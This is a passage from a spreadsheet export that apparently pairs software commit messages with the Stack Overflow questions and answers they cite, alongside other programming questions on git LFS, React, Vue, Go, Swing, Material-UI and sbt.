user.email=&amp;lt;email&amp;gt;
core.sshcommand=ssh -i ~/.ssh/id_rsa
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Local:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;init.defaultbranch=main
filter.lfs.clean=git-lfs clean -- %f
filter.lfs.smudge=git-lfs smudge -- %f
filter.lfs.process=git-lfs filter-process
filter.lfs.required=true
user.name=&amp;lt;name&amp;gt;
user.email=&amp;lt;email&amp;gt;
core.sshcommand=ssh -i ~/.ssh/id_rsa
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the git lfs env post cloning command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;git version 2.39.5 (Apple Git-154)
Endpoint=https://github.com/my.git/info/lfs (auth=none)
SSH=git@github.com:my.git
LocalWorkingDir=&amp;lt;Repo Local Path&amp;gt;
LocalGitDir=&amp;lt;Repo Local Path&amp;gt;/.git
LocalGitStorageDir=&amp;lt;Repo Local Path&amp;gt;/.git
LocalMediaDir=&amp;lt;Repo Local Path&amp;gt;/.git/lfs/objects
LocalReferenceDirs=
TempDir=&amp;lt;Repo Local Path&amp;gt;/.git/lfs/tmp
ConcurrentTransfers=8
TusTransfers=false
BasicTransfersOnly=false
SkipDownloadErrors=false
FetchRecentAlways=false
FetchRecentRefsDays=7
FetchRecentCommitsDays=0
FetchRecentRefsIncludeRemotes=true
PruneOffsetDays=3
PruneVerifyRemoteAlways=false
PruneVerifyUnreachableAlways=false
PruneRemoteName=origin
LfsStorageDir=&amp;lt;Repo Local Path&amp;gt;/.git/lfs
AccessDownload=none
AccessUpload=none
DownloadTransfers=basic,lfs-standalone-file,ssh
UploadTransfers=basic,lfs-standalone-file,ssh
GIT_EXEC_PATH=/Library/Developer/CommandLineTools/usr/libexec/git-core
git config filter.lfs.process = &amp;quot;git-lfs filter-process&amp;quot;
git config filter.lfs.smudge = &amp;quot;git-lfs smudge -- %f&amp;quot;
git config filter.lfs.clean = &amp;quot;git-lfs clean -- %f&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While cloning I'm getting the following error:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;remote: Enumerating objects: 306452, done.
remote: Counting objects: 100% (128/128), done.
remote: Compressing objects: 100% (110/110), done.
remote: Total 306452 (delta 25), reused 95 (delta 13), pack-reused 306324 (from 1)
Receiving objects: 100% (306452/306452), 306.57 MiB | 7.02 MiB/s, done.
Resolving deltas: 100% (217920/217920), done.
Updating files: 100% (38962/38962), done.
Downloading &amp;lt;file path&amp;gt; (537 KB)
Error downloading object: &amp;lt;file path&amp;gt; (d93b748): Smudge error: Error downloading &amp;lt;file path&amp;gt;
(d93b748a2ac23a86fea024bf677f10983b6019be9c9d3126f25577b2cb1368b9): 
LFS: Authorization error: https://github-cloud.githubusercontent.com/&amp;lt;url&amp;gt;
Check that you have proper access to the repository
Errors logged to '/&amp;lt;path&amp;gt;/.git/lfs/logs/20250220T051529.861782.log'.
Use `git lfs logs last` to view the log.
error: external filter 'git-lfs filter-process' failed
fatal: &amp;lt;file path&amp;gt;: smudge filter lfs failed
warning: Clone succeeded, but checkout failed.
You can inspect what was checked out with 'git status'
and retry with 'git restore --source=HEAD :/'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;git remote -v output:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;origin  git@github.com:my.git (push)```
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C534</t>
  </si>
  <si>
    <t>[RFR] Documentation issues fixes
- [x] Fixed bad links for authorization chapters
- [x] Fixed mention of a ReferenceManyInput which does not exist (see [stackoverflow](https://stackoverflow.com/questions/46486514/input-components-not-working/46500718)</t>
  </si>
  <si>
    <t>Don't you have an error in the console about ReferenceManyInput ? This component does not exist.
I checked the documentation and we indeed included it in the Resources chapter. It will be fixed soon.
For referencing many other resources, you should use the ReferenceArrayInput. However, it does not support Datagrids. There are not components allowing you to edit related resources yet.</t>
  </si>
  <si>
    <t xml:space="preserve">In a [external-link] I found out how to create a plugin architecture for MVC. I'm not the whole way down that path yet but I do have a nice way of splitting things up.
One thing that is bugging me though is the intellesense for the View when they are in the Class Library. Developing them in the core MVC project and then copying them across is a pain.
Basically the problem that I'm having is that I don't understand well enough how Visual Studio is dealing with the aspx files. I'm on Beta at the moment, I'm thinking that I might be able to take advantage of explicit view building that comes with RC1.
Any help would be appreciated.
update:
I have all of the finding of views sorted out when it is actually running, its the editing of them in visual studio I'm interested in. Do they have to be in a web type project?
</t>
  </si>
  <si>
    <t>C535</t>
  </si>
  <si>
    <t>fix: fixed linter problems in components
moduleResolution: true
y problemas de import de React y ReactDom
con https://stackoverflow.com/questions/51902844/node-modules-types-react-index-has-no-default-export</t>
  </si>
  <si>
    <t>You have to use import * as React from "react"; instead of import React from 'react'.
That happens because babel (the one that you were using before) assumes modules.export as default export while typescript (the one that you are using now) does not.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not even sure what the term for this is, so I'm going to use an example. If I write 1st or 2nd then often the st and nd are small and at the top of the line, not at the bottom of the line.&lt;/p&gt;
&lt;p&gt;How do I code this?&lt;/p&gt;
&lt;p&gt;Specifically looking for how to code it in sigil, which doesn't seem to recognise span/span. It's in a line which has p/p tags so what I have imagined is like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;p&amp;gt;We'll do that on the 1&amp;lt;?&amp;gt;st&amp;lt;/?&amp;gt; of March.&amp;lt;/p&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What do I put in the ?/? bracket&lt;/p&gt;
&lt;p&gt;I can use small/small tags to make it small but I can't get it to sit at the top of the line.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C536</t>
  </si>
  <si>
    <t>feat: added logging to some components + LocationManage tweaks (#108)
https://github.com/CocoaLumberjack/CocoaLumberjack
https://stackoverflow.com/questions/55259546/ios-save-to-log-file-and-extract-later</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently considering using DotNetNuke as a base for our future portal-based and client-customizable web application that is going to be hosted centrally. The idea is to make the dynamic parts as DNN modules that in turn talk to backend WCF-services which takes care of the business processing and data storage.
What are your good/bad experiences with such a model?
Anything you would warn against or recommend?
Any advice would be appreciated, thanks...
</t>
  </si>
  <si>
    <t>C537</t>
  </si>
  <si>
    <t>feat(image-information): add a close icon leading back to the image-v
iewer
This component is loaded when you click on `More information` button from the `InformationPanel`.
It will be then handled by the router and displayed.
AS it is the only case, I assume it's ok to add a simple `router-link` pointing back to the ImageViewer for the same image.
If required, the current behavior can be changed to [use the previous route instead](https://stackoverflow.com/a/53789212).</t>
  </si>
  <si>
    <t>All of vue-router's navigation guards receive the previous route as a from argument ..
Every guard function receives three arguments:
to: Route: the target Route Object being navigated to.
from: Route: the current route being navigated away from.
next: Function: this function must be called to resolve the hook. The action depends on the arguments provided to next
As an example you could use beforeRouteEnter, an in-component navigation guard, to get the previous route and store it in your data ..
...
data() {
 return {
   ...
   prevRoute: null
 }
},
beforeRouteEnter(to, from, next) {
  next(vm =&gt; {
    vm.prevRoute = from
  })
},
...
Then you can use this.prevRoute.path to get the previous URL.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am configuring a workflow where messages from an SQS queue trigger AWS Batch jobs, and the content of these messages is passed as environment variables to the container executing the job. I am using AWS EventBridge Pipes to connect the SQS queue to AWS Batch.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/QsMlqVRn.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/QsMlqVRn.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# ðŸ“Œ EventBridge Pipes - LigaÃ§Ã£o SQS -&amp;gt; AWS Batch
resource &amp;quot;aws_pipes_pipe&amp;quot; &amp;quot;pipe&amp;quot; {
  name     = &amp;quot;sqs-to-batch-pipe&amp;quot;
  role_arn = aws_iam_role.pipes.arn
  source = aws_sqs_queue.queue.arn
  target = aws_batch_job_queue.queue.arn
  source_parameters {
    sqs_queue_parameters {
      batch_size = 1
    }
  }
  target_parameters {
    batch_job_parameters {
        job_definition = aws_batch_job_definition.job.arn
        job_name       = &amp;quot;my-batch-job&amp;quot;
        parameters = {
            MESSAGE = &amp;quot;$.body&amp;quot; &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt; I can't send the message to the container
        }
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the configuration I am using:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;SQS Queue: I have an SQS queue named my-batch-queue that receives
JSON messages.&lt;/li&gt;
&lt;li&gt;AWS Batch Job Definition: I created an AWS Batch job definition
(batch-job-definition) specifying a Docker container hosted on
Amazon ECR. Within this definition, I configured an environment
variable named MESSAGE with a default value.&lt;/li&gt;
&lt;li&gt;EventBridge Pipe: I set up an EventBridge pipe with the SQS queue as
the source and the AWS Batch job queue (batch-job-queue) as the
target. In the target_parameters of the pipe, I configured
batch_job_parameters with parameters to pass the SQS message body as
the value of the MESSAGE environment variable.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In my Node.js application, I am attempting to access the MESSAGE environment variable as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;console.log(&amp;quot;Received message:&amp;quot;, process.env.MESSAGE);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, the displayed value is always 'default_value', indicating that the SQS message body is not being correctly passed to the container.&lt;/p&gt;
&lt;p&gt;Question:&lt;/p&gt;
&lt;p&gt;How can I configure EventBridge Pipes to correctly pass the content of SQS messages as environment variables to the AWS Batch container? Is there an appropriate way to override the MESSAGE variable defined in the aws_batch_job_definition with the SQS message content when the job is triggered by EventBridge Pipes?&lt;/p&gt;
&lt;p&gt;Additional Details:&lt;/p&gt;
&lt;p&gt;I understand that AWS Batch allows defining environment variables in the job_definition, but I am unable to override the MESSAGE variable with the SQS message content at runtime.&lt;/p&gt;
&lt;p&gt;I have attempted to use the parameters attribute in the aws_pipes_pipe, but have not been successful in passing the SQS message content to the container.&lt;/p&gt;
&lt;p&gt;Any guidance or configuration examples would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C538</t>
  </si>
  <si>
    <t>Disallow unexported component interface methods.
Previously, if a Service Weaver application included a component
interface with unexported methods, the app would panic at runtime.
Thanks to ricardo.jmd.oliveira on our [Discord server][discord] for
reporting this bug.
Rather than supporting unexported methods, this PR prohibits them.
Unexported methods complicate code generation, as client and server
stubs have to implement the unexported methods even though these methods
will never get called. Furthermore, we're considering allowing component
interfaces and implementations to be in separate packages. If we do
allow this, it will be even harder to generate implementations of the
interface without resorting to some [tricks][].
[discord]: https://discord.gg/FzbQ3SM8R5
[tricks]: https://stackoverflow.com/a/26181609</t>
  </si>
  <si>
    <t>You can implement an interface with unexported methods using anonymous struct fields, but you cannot provide your own implementation of the unexported methods. For example, this version of Adapter satisfies the accounting.IAdapter interface.
type Adapter struct {
    accounting.IAdapter
}
There's nothing that I can do with Adapter to provide my own implementation of the IAdapter.getInvoice() method.
This trick is not going to help you.
If you don't want other packages to use accountingsystem.Adapter directly, then make the type unexported and add a function for registering the adapter with the accounting package.
package accounting
type IAdapter interface {
    GetInvoice() error
}
---
package accountingsystem
type adapter struct {}
func (a adapter) GetInvoice() error {return nil}  
func SetupAdapter() {
    accounting.SetAdapter(adapter{})
}
---
package main
func main() {
    accountingsystem.SetupAdapter()
}</t>
  </si>
  <si>
    <t xml:space="preserve">I suppose most of the developers have an idea of multi-layer architecture. We have DAL (Data access layer), we have BLL (business logic layer) and somewhere near the end of the road we have our UI. If you have a project which somehow follows these principles, do you keep (or at least try) to keep/put the things where they conceptually belong? I'm especially interested in big company applications where you work together with many other people. Clearly you can do whatever you want with your private toy project, invent any kind of an architecture and stick to it. It is not so easy with big projects where lots of people contributed to the software or overall mess.
For example, I happened to see things like UI components going directly to the database to fetch some "missing" extra data which BL does not supply, also both UI and BL working with low level elements like table fields where in my opinion they should delegate these operations to the lower level namely DAL. It was especially sad when after discussing the things with the senior developer guy I saw he didn't see a problem with this at all.
We can of course assume me and whoever shares my point of view are just being perfectionists, but I clearly saw a very disadvantegous consequence in that it took me prolonged periods of time in some of my tasks to trace all the "parallel" routes that the data is travelling to and from the database and to identify whoever and in which way may now be affected by the new functionality I implemented. The way I see it, these are increased further development / maintenance costs overweighting some savings when someone decided to quickly hack the stuff and close the task as soon as possible.
Are you projects "pure" or they abandoned the idea of keeping the clear line between layers a long time ago? If you still keeping it right, how do you deal with colleagues who do not understand these things or don't care about them just building "custom" solutions and hacking hacks all the time? Or at some point in time you stopped fighting with the windmill and accepted it as your punishment?
</t>
  </si>
  <si>
    <t>C539</t>
  </si>
  <si>
    <t>Allow select components to have duplicate values.
Previously, the code raised react errors if we attempted to add a select
element which contained duplicate values. Fixed so that this is now
possible. See http://stackoverflow.com/questions/19714128</t>
  </si>
  <si>
    <t>The value of the option in the select list doesn’t affect the validity of the select element.
One thing that you need to keep in mind is that the id of an element must be unique for consistency in accessing that element properly. If duplicate ids exist for multiple elements the last instance of that id will be selected. You definitely need not worry about the duplication of values of the options in the select list.
This may even be required too, e.g. the following:
&lt;select&gt;
    &lt;option value="fruit"&gt;mango&lt;/option&gt;
    &lt;option value="flower"&gt;rose&lt;/option&gt;
    &lt;option value="fruit"&gt;pineapple&lt;/option&gt;
    &lt;option value="flower"&gt;lotus&lt;/option&gt;
    &lt;option value="flower"&gt;lily&lt;/option&gt;
&lt;/select&gt;
Now if the user selects any of rose, lotus, or lily, the value of the select element will be flower, and in case either of mango and pineapple is selected, the value of the select element will be fruit. So it’s perfectly OK, and you may need this sometimes.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for how to modify a function to find the second largest divisor and not the largest as it is outputting for me:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;n = int(input(&amp;quot;Enter an integer:&amp;quot;))
result = 1
for i in range(2, n):
    if ((n % i) == 0):
        result = i
print(result)
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;Enter an integer:36
18
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using an example input of &lt;code&gt;36&lt;/code&gt; the output will be &lt;code&gt;18&lt;/code&gt;. I'm wanting to find the next largest divisor instead, which would be &lt;code&gt;12&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How would I go about modifying my function to make the output &lt;code&gt;12&lt;/code&gt; instead of &lt;code&gt;18&lt;/code&gt; (assuming the input is &lt;code&gt;36&lt;/code&gt;)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C54</t>
  </si>
  <si>
    <t>Add sigar to SBT library dependencies.
sigar provides system monitoring data such as:
- System memory, swap, cpu, load average, uptime, logins
- Per-process memory, cpu, credential info, state, arguments, environment, open files
- File system detection and metrics
- Network interface detection, configuration information and metrics
- Network route and connection tables
- Native classifier is used because sigar includes native libs
- copyNativeLibraries task is added to unzip sigar native libraries under target/native_libraries/
See
http://stackoverflow.com/questions/14966414/including-hyperic-sigar-library-within-jar-while-using-sbt-assembly-for-scala-pr
http://stackoverflow.com/questions/19303553/adding-libsigar-shared-library-in-sbt-project-without-using-java-library-path?rq=2</t>
  </si>
  <si>
    <t>I'm building a Scala project with sbt and creating a fat jar with the sbt-assembly plugin. I'm able to add unmanaged jars (such as the Sigar jar) by adding the following to `build.sbt`.
    unmanagedJars in Compile +=
        file("lib/hyperic-sigar-1.6.4/sigar-bin/lib/sigar.jar")
However, when I try running this, I get the following error because the `*.so` libraries are not included in the jar.
    no libsigar-amd64-linux.so in java.library.path
    org.hyperic.sigar.SigarException: no libsigar-amd64-linux.so in java.library.path
    	at org.hyperic.sigar.Sigar.loadLibrary(Sigar.java:172)
    	at org.hyperic.sigar.Sigar.&lt;clinit&gt;(Sigar.java:100)
    Exception in thread "main" java.lang.UnsatisfiedLinkError: org.hyperic.sigar.ptql.SigarProcessQuery.create(Ljava/lang/String;)V
    	at org.hyperic.sigar.ptql.SigarProcessQuery.create(Native Method)
    	at org.hyperic.sigar.ptql.ProcessQueryFactory.getQuery(ProcessQueryFactory.java:66)
    	at org.hyperic.sigar.ptql.ProcessFinder.findSingleProcess(ProcessFinder.java:44)
---------
The libraries I want to include are in `lib/hyperic-sigar-1.6.4/sigar-bin/lib/*.so` and they need to be linked to a directory in the classpath within the jar. The only way I know of to do a mapping like this is:
    resourceDirectory in Compile &lt;&lt;=
        baseDirectory{ _ / "lib/hyperic-sigar-1.6.4/sigar-bin/lib" }
This causes the `*.so` libraries to be added to __root__ of the jar, but not a specific directory. How can I specify a resource map to map from `lib/hyperic-sigar-1.6.4/sigar-bin/lib/*.so` to a directory in the classpath in my jar? What is the terminology for what I'm trying to do?</t>
  </si>
  <si>
    <t>Add sigar to SBT library dependencies.
sigar provides system monitoring data such as:
- System memory, swap, cpu, load average, uptime, logins
- Per-process memory, cpu, credential info, state, arguments, environment, open files
- File system detection and metrics
- Network interface detection, configuration information and metrics
- Network route and connection tables
- Native classifier is used because sigar includes native libs
- copyNativeLibraries task is added to unzip sigar native libraries under target/native_libraries/
See
http://stackoverflow.com/questions/14966414/including-hyperic-sigar-library-within-jar-while-using-sbt-assembly-for-scala-pr
http://stackoverflow.com/questions/19303553/adding-libsigar-shared-library-in-sbt-project-without-using-java-library-path?rq=1</t>
  </si>
  <si>
    <t>Assuming that sigar is indeed capable of loading native libs from classpath, this should do the trick:
libraryDependencies += "org.fusesource" % "sigar" % "1.6.4" classifier("native") classifier("")
Otherwise, you need to unpack them from the jar manually and provide proper java.library.path</t>
  </si>
  <si>
    <t xml:space="preserve">I have recently been doing a bit of investigation into the different types of Model View architectures, and need to decide which one to pursue for future in-house development. As I'm currently working in a Microsoft shop that has ASP.NET skills, it seems my options are between ASP.NET MVC and WCSF (Monorail is probably out of the as it wouldn't be supported by Microsoft).
After reading [external-link], I picked up the following points:  
ASP.NET MVC cannot use web controls that rely on postbacks, whereas WCSF can.
You have more control over the urls in an ASP.NET MVC site as opposed to a WCSF site.
An ASP.NET MVC site will probably be easier to test than an equivalent WCSF version.
It seems that the WCSF still uses the code behind to control UI events under some circumstances, but ASP.NET MVC doesn't allow this. 
What are some of the other considerations? 
What have I misunderstood?
Is there anybody out there who has used both frameworks and has advice either way?
</t>
  </si>
  <si>
    <t>C540</t>
  </si>
  <si>
    <t>Material-UI is working again in the custom element
MUI adds styles at runtime via JS, and by default they get added to the
HTML head.  I found a solution that adds them under the shadow root:
https://stackoverflow.com/questions/51832583/react-components-material-ui-theme-not-scoped-locally-to-shadow-dom</t>
  </si>
  <si>
    <t>I had the same issue packaging my web application for integration with another framework, which required my React app to be exported as a Web Component. After struggling for a while with libraries like
react-jss
and having no luck, I finally came across
this Stack Overflow answer
by
@shawn-mclean
this morning. I had seen your question while banging my head against my desk and wanted to pass on what worked for me.
In summary, I first had to create the Web Component
WCRoot.js
import React from 'react';
import ReactDOM from 'react-dom';
import { StylesProvider, jssPreset } from '@material-ui/styles';
import { create } from 'jss';
import App from './App';
class WCRoot extends HTMLElement {
    connectedCallback() {
        const shadowRoot = this.attachShadow({ mode: 'open' });
        const mountPoint = document.createElement('span');
        // first we need to store a reference to an element INSIDE of the shadow root        
        const reactRoot = shadowRoot.appendChild(mountPoint);
        // now we use that saved reference to create a JSS configuration
        const jss = create({
            ...jssPreset(),
            insertionPoint: reactRoot
        });
        // finally we need to wrap our application in a StylesProvider
        ReactDOM.render(
            &lt;StylesProvider jss={jss}&gt;
                &lt;App /&gt;
            &lt;/StylesProvider&gt;,
            mountPoint);
    }
}
customElements.define('wc-root', WCRoot);
Next, I set my
index.js
to render
&lt;wc-component&gt;&lt;/wc-component&gt;
instead of
&lt;App /&gt;
:
index.js
import React from 'react';
import ReactDOM from 'react-dom';
import './index.css';
// eslint-disable-next-line
import WCRoot from './WCRoot';
ReactDOM.render(&lt;wc-root&gt;&lt;/wc-root&gt;, document.getElementById('root'));
One thing which surprised me is that we don't need to modify the
MuiThemeProvider
at all...it just grabs the existing JSS context provided by the
StylesProvider
. I believe you should be able to modify
content.js
to look something like the following:
content.js
var app = $('&lt;div id="Extension" style="position: fixed; display: block; bottom: 0px; left: 0px; width: 100vw; height: 48px; background: grey; z-index: 99999"&gt;&lt;/div&gt;')
app.prependTo('body');
var shadowRoot = this.attachShadow({ mode: 'open' });
var mountPoint = document.getElementById('Extension');
var reactRoot = shadowRoot.appendChild(mountPoint);
// see code blocks above for the import statements for `create` and `jssPreset`
var jss = create({
    ...jssPreset(),
    insertionPoint: reactRoot
});
render(
    &lt;StylesProvider jss={jss}&gt;
        &lt;App /&gt;
    &lt;/StylesProvider&gt;,
    mountPoint);</t>
  </si>
  <si>
    <t xml:space="preserve">Can the folders within the View have subfolders? if so, how does the Controller reach them? For example... I would like to have the following urls work correctly:
Admin/Index
Admin/Profile/Index
Admin/Profile/Edit/1
Admin/Group/Index
Admin/Group/Edit/1
So, would I create a folder for Profile and Group as a subfolder within Admin?
I tried this and to map a route in the Global file but that does not seem to be working.
</t>
  </si>
  <si>
    <t>C541</t>
  </si>
  <si>
    <t>Added Material UI theme Plugin to load use material ui dark theme and
 components
Difference between gatsby-theme-material-ui and gatsby-plugin-material-ui:
https://stackoverflow.com/questions/62111484/difference-between-gatsby-theme-material-ui-and-gatsby-plugin-material-ui</t>
  </si>
  <si>
    <t>Both packages do the trick: Get Material UI into your project.
The difference is that
gatsby-theme-material-ui
is more complete and user-friendly for beginners.  For example with the
plugin
, you have to make sure you load the roboto font or the MUI
theme
yourself. The
theme
sets everything you need for Material UI up for you and you can start developing right away.
All the
plugin
does is to make sure the Material UI styles are properly loaded into your project. This is important because of how Gatsby works with server-side rendering. This can be tricky to get right and understand when starting out. But you still have to get your fonts and the theme provider setup as explained in the
docs
.
There is a technical
comparison
what each plugin does:
Theme vs. Plugin
gatsby-plugin-material-ui solves FOUC, auto prefixing and minification.
gatsby-theme-material-ui uses the plugin under the hood, adds web fonts, meta-viewport, CSS baseline and mui theme support and has material ui styled gatsby link components
For new users I would recommend
gatsby-theme-material-ui
how can I implement them in order to have a Theme Customized
Follow the
documentation
. Create the file
src/gatsby-theme-material-ui-top-layout/theme.js
and use this file to customize your theme as described in the
MUI docs
.
Where should I put the theme.js and where to put the ThemeProvider wrapper
Follow the
documentation
. Create a provider in
src/gatsby-theme-material-ui-top-layout/components/top-layout.js
.
And also how to configure the project
Follow the
documentation
.
// with npm
npm install gatsby-theme-material-ui @material-ui/core
// with yarn
yarn add gatsby-theme-material-ui @material-ui/core
Edit gatsby-config.js
module.exports = {
  plugins: [
    // ... other plugins
    `gatsby-theme-material-ui`
  ],
};
Your Gatsby configuration is done.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I really expected this to work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;type_traits&amp;gt;
struct serialiser_deserialiser
{
    template &amp;lt;typename U&amp;gt;
    void read_or_write(U&amp;amp; obj_to_write)
    {
        if constexpr (this-&amp;gt;isTrue&amp;lt;int&amp;gt;())
        {
        }
    }
    template &amp;lt;typename T&amp;gt;
    constexpr bool isTrue() const { return true; }
};
int main() {
    serialiser_deserialiser serialiser_obj;
    int a;
    serialiser_obj.read_or_write(a);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However the error I get is:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;error: constexpr if condition is not a constant expression&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What is the reason this isn't a constant expression? Does it have something to do with the fact that it's isTrue() is being called from a templated function? Or that isTrue itself is a templated function?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C542</t>
  </si>
  <si>
    <t>Extract querystring variables in a more robust fashion
See: http://stackoverflow.com/a/3855394/639319 for the version we've used, primary advantage is decoding the uri components (just in case).</t>
  </si>
  <si>
    <t>ES2015 (ES6)
getQueryStringParams = query =&gt; {
    return query
        ? (/^[?#]/.test(query) ? query.slice(1) : query)
            .split('&amp;')
            .reduce((params, param) =&gt; {
                    let [key, value] = param.split('=');
                    params[key] = value ? decodeURIComponent(value.replace(/\+/g, ' ')) : '';
                    return params;
                }, {}
            )
        : {}
};
Without jQuery
var qs = (function(a) {
    if (a == "") return {};
    var b = {};
    for (var i = 0; i &lt; a.length; ++i)
    {
        var p=a[i].split('=', 2);
        if (p.length == 1)
            b[p[0]] = "";
        else
            b[p[0]] = decodeURIComponent(p[1].replace(/\+/g, " "));
    }
    return b;
})(window.location.search.substr(1).split('&amp;'));
With an URL like ?topic=123&amp;name=query+string, the following will return:
qs["topic"];    // 123
qs["name"];     // query string
qs["nothere"];  // undefined (object)
Google method
Tearing Google's code I found the method they use: getUrlParameters
function (b) {
    var c = typeof b === "undefined";
    if (a !== h &amp;&amp; c) return a;
    for (var d = {}, b = b || k[B][vb], e = b[p]("?"), f = b[p]("#"), b = (f === -1 ? b[Ya](e + 1) : [b[Ya](e + 1, f - e - 1), "&amp;", b[Ya](f + 1)][K](""))[z]("&amp;"), e = i.dd ? ia : unescape, f = 0, g = b[w]; f &lt; g; ++f) {
        var l = b[f][p]("=");
        if (l !== -1) {
            var q = b[f][I](0, l),
                l = b[f][I](l + 1),
                l = l[Ca](/\+/g, " ");
            try {
                d[q] = e(l)
            } catch (A) {}
        }
    }
    c &amp;&amp; (a = d);
    return d
}
It is obfuscated, but it is understandable. It does not work because some variables are undefined.
They start to look for parameters on the url from ? and also from the hash #. Then for each parameter they split in the equal sign b[f][p]("=") (which looks like indexOf, they use the position of the char to get the key/value). Having it split they check whether the parameter has a value or not, if it has then they store the value of d, otherwise they just continue.
In the end the object d is returned, handling escaping and the + sign. This object is just like mine, it has the same behavior.
My method as a jQuery plugin
(function($) {
    $.QueryString = (function(paramsArray) {
        let params = {};
        for (let i = 0; i &lt; paramsArray.length; ++i)
        {
            let param = paramsArray[i]
                .split('=', 2);
            if (param.length !== 2)
                continue;
            params[param[0]] = decodeURIComponent(param[1].replace(/\+/g, " "));
        }
        return params;
    })(window.location.search.substr(1).split('&amp;'))
})(jQuery);
Usage
//Get a param
$.QueryString.param
//-or-
$.QueryString["param"]
//This outputs something like...
//"val"
//Get all params as object
$.QueryString
//This outputs something like...
//Object { param: "val", param2: "val" }
//Set a param (only in the $.QueryString object, doesn't affect the browser's querystring)
$.QueryString.param = "newvalue"
//This doesn't output anything, it just updates the $.QueryString object
//Convert object into string suitable for url a querystring (Requires jQuery)
$.param($.QueryString)
//This outputs something like...
//"param=newvalue&amp;param2=val"
//Update the url/querystring in the browser's location bar with the $.QueryString object
history.replaceState({}, '', "?" + $.param($.QueryString));
//-or-
history.pushState({}, '', "?" + $.param($.QueryString));
Performance test (split method against regex method) (jsPerf)
Preparation code: methods declaration
Split test code
var qs = window.GetQueryString(query);
var search = qs["q"];
var value = qs["value"];
var undef = qs["undefinedstring"];
Regex test code
var search = window.getParameterByName("q");
var value = window.getParameterByName("value");
var undef = window.getParameterByName("undefinedstring");
Testing in Firefox 4.0 x86 on Windows Server 2008 R2 / 7 x64
Split method: 144,780 ±2.17% fastest
Regex method: 13,891 ±0.85% | 90% slower</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone have any white papers or articles that would compare and contrast a web architecture where a .NET client component is required and the options being considered are ActiveX or a .Net component solution? 
I have a customer that wants to architecturally recommend a .Net client approach over Active X.  However, there are some strong opinions for ActiveX.  What I would like to do is gather more background and industry support for our direction.  
I personally would not recommend that anybody write an ActiveX component any more.  If they are in need on enhanced features in the browser deployment model, I would generally recommend using WPF via XBAP or writing a Silverlight application.  Ideally, I'd like to have a conversation about the pros / cons of standard web, augmented web (silverlight), or platform optimized (WPF).
Is this something you guys can help point us in the right direction?  Any thoughts?
</t>
  </si>
  <si>
    <t>C543</t>
  </si>
  <si>
    <t>Force repaint after component validation
Apparently, removing a Swing container's components does not trigger a
repaint.  Thus, one must be forced after validating the container
(component removal *does* trigger invalidation, which is why validation
is still necessary).
See [1] for more information.
[1] https://stackoverflow.com/questions/1097366/java-swing-revalidate-vs-repaint</t>
  </si>
  <si>
    <t>You need to call repaint() and revalidate(). The first one tells Swing that an area of the window is dirty (which is necessary to erase the image of the old children removed by removeAll()); the second one tells the layout manager to recalculate the layout (which is necessary when adding components). This should cause children of the panel to repaint, but may not cause the panel itself to do so (see this for the list of repaint triggers).
On a more general note: rather than reusing the original panel, I'd recommend building a new panel and swapping them at the parent.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hello I'm wondering if anyone could assist me. I'm getting the following error messages when using Composer Setup on Windows VPS server 2025:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;The PHP exe file you specified did not run correctly [exit code 1]:
C:\Program Files (x86)\PHP\php.exe
Reported error: Incorrect function
Program Output:
PHP Warning:  'C:\windows\SYSTEM32\VCRUNTIME140.dll' 14.0 is not compatible with this PHP build linked with 14.29
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I cannot seem to find the &lt;code&gt;PHP.ini&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I've been trying to get PHP to run on my VPS but keep having the same error need assistance badly to let the setup run and work&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C544</t>
  </si>
  <si>
    <t>Exclude xml-apis dependency from batik components
We decided to always exclude this artifact from
dependencies managed by the SciJava Bill of Materials.
For some relevant discussion, see:
http://stackoverflow.com/q/11677572</t>
  </si>
  <si>
